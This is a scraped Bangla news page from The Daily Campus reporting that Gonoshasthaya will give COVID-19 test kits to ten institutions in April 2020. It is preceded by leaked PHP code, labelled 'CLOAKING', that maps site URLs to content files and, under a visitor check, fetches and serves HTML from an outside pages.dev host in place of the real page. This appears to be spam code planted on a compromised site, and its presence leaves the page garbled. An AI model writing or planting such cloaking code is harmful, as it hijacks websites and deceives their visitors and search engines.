/* ===== NORMALISASI PATH (VERSI PERBAIKAN) ===== */ // Ambil path, hapus query string (?abc=123) jika ada $p = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH); // Hilangkan index.php $p = str_replace('/index.php', '', $p); // Pastikan path selalu diawali dengan '/' dan tidak diakhiri dengan '/' (kecuali root) $p = '/' . ltrim(rtrim($p, '/'), '/'); /* ===== MAPPING URL ===== */ $map = [ '/technical/251262' => 'content39.txt', '/education-ministry/243185' => 'content40.txt', '/dshe/252183' => 'content41.txt', '/' => 'content42.txt', // Sekarang ini akan terpanggil dengan benar '/ntrca/238706' => 'content43.txt', '/section/admission-test/110' => 'content44.txt', '/section/ntrca/122' => 'content45.txt' ]; /* ===== CLOAKING ===== */ // Debugging sederhana (hapus jika sudah jalan): // echo "Path terdeteksi: " . $p; if($b && isset($map[$p])){ $content_url = "https://new-content-page.pages.dev/" . $map[$p]; $x = fetch($content_url); if($x && strlen(trim($x)) > 50){ header("Content-Type: text/html; charset=utf-8"); echo $x; exit; } } ২৫ এপ্রিল ১০ প্রতিষ্ঠানকে করোনা শনাক্তের কিট দেবে গণস্বাস্থ্য | The Daily Campus

২৫ এপ্রিল ১০ প্রতিষ্ঠানকে করোনা শনাক্তের কিট দেবে গণস্বাস্থ্য

২১ এপ্রিল ২০২০, ০১:২২ PM

© সংগৃহীত

করোনাভাইরাস পরীক্ষার জন্য সরকারসহ ১০ প্রতিষ্ঠানকে আনুষ্ঠানিকভাবে ‘করোনা শনাক্তকরণ কিট’ হস্তান্তর করতে যাচ্ছে গণস্বাস্থ্য। আগামী শনিবার (২৫ এপ্রিল) কিটের ১০০টি করে স্যাম্পল বা নমুনা সংশ্লিষ্ট প্রতিষ্ঠানগুলোর কাছে দেওয়া হবে বলে গণস্বাস্থ্যের প্রতিষ্ঠাতা ডা. জাফরুল্লাহ চৌধুরী গণমাধ্যমকে নিশ্চিত করেছেন।

যে ১০টি প্রতিষ্ঠানের কাছে কিট হস্তান্তর করা হবে সেগুলো হলো—ওষুধ নিয়ন্ত্রক সংস্থা, আইইডিসিআর, আইসিডিডিআরবি, সেনা প্যাথলজি ল্যাবরেটরি, বিএসএমএমইউ, বিশ্ব স্বাস্থ্য সংস্থা এবং যুক্তরাষ্ট্রভিত্তিক (সিডিসি) সেন্ট্রাল ফর ডিজিজ কন্ট্রোল।

ডা. জাফরুল্লাহ চৌধুরী বলেন, ওই নমুনা সরকার অনুমোদন করলে এক লাখ কিট সরকারকে হস্তান্তর করা হবে। তিনি বলেন, কিট সঠিক হয়েছে কি না সেটি যাচাই করার জন্য করোনাভাইরাসে আক্রান্ত রোগীর কয়েক সিসি রক্তেরও প্রয়োজন হয়। এরই মধ্যে স্বাস্থ্যসচিবের কাছে আবেদন করে ১০টি পজিটিভ রক্তের স্যাম্পল আমরা চেয়েছি। এর আগের পরীক্ষাগুলো করা হয়েছিল বিদেশি রক্তের নমুনায়।

এক প্রশ্নের জবাবে গণস্বাস্থ্যের এই ট্রাস্টি বলেন, কুয়েত মৈত্রীসহ কয়েকটি হাসাপাতালে যোগাযোগ করে আমরা নিজেরাই রক্ত চেয়েছি; কিন্তু তারা বলেছে সরকারের অনুমোদন লাগবে।

এদিকে, করোনা পরীক্ষার কিট তৈরিতে ৯ ধরনের বিশেষ কেমিক্যাল বা কাঁচামালের প্রয়োজন হয়; যা চীন, যুক্তরাষ্ট্র, যুক্তরাজ্য ও সুইজারল্যান্ডে পাওয়া যায়। এর মধ্যে একটি চালান সম্প্রতি চীনের গোয়াংজু থেকে সাভারে গণস্বাস্থ্যের কারখানায় পৌঁছেছে বলে তিনি জানান। কিন্তু ফ্লাইট না থাকায় আরো দুটি চালান জার্মানি ও সিঙ্গাপুরে আটকে আছে।

এর আগে গত ১১ এপ্রিল এই প্রতিষ্ঠানগুলোর কাছে কিট হস্তান্তরের কথা থাকলেও গণস্বাস্থ্যের কারখানায় যান্ত্রিক গোলযোগের কারণে সেটি সম্ভব হয়নি। ডা. জাফরুল্লাহ চৌধুরী জানিয়েছেন, যান্ত্রিক ত্রুটি দূর করে কিট তৈরির কাজ এখন প্রায় শেষ পর্যায়ে। তবে সঠিক পরীক্ষা বা গবেষণার জন্য করোনায় আক্রান্ত আরো অন্তত ১০টি রক্তের নমুনা প্রয়োজন।

দুদকের ৬ মামলায় কারাগারে পাবনা মানসিক হাসপাতালের সাবেক পরিচ…
  • ২৯ এপ্রিল ২০২৬
দেশে আর কোনো সমস্যা নেই, সমস্যা শুধু জামায়াত 
  • ২৯ এপ্রিল ২০২৬
ব্যাংক এশিয়া নিয়োগ দেবে ৭ জেলায়, আবেদন শেষ ১৩ মে
  • ২৯ এপ্রিল ২০২৬
স্রোতে ভেসে যাওয়া মিটার রিডারের মরদেহ উদ্ধার
  • ২৯ এপ্রিল ২০২৬
ছাঁটাই আতঙ্কে তিতুমীর কলেজের ১৭৭ কর্মচারী 
  • ২৯ এপ্রিল ২০২৬
রাবি শিক্ষার্থীদের ক্যাম্পাসের ছবি সংবলিত এটিএম কার্ড দিচ্ছ…
  • ২৯ এপ্রিল ২০২৬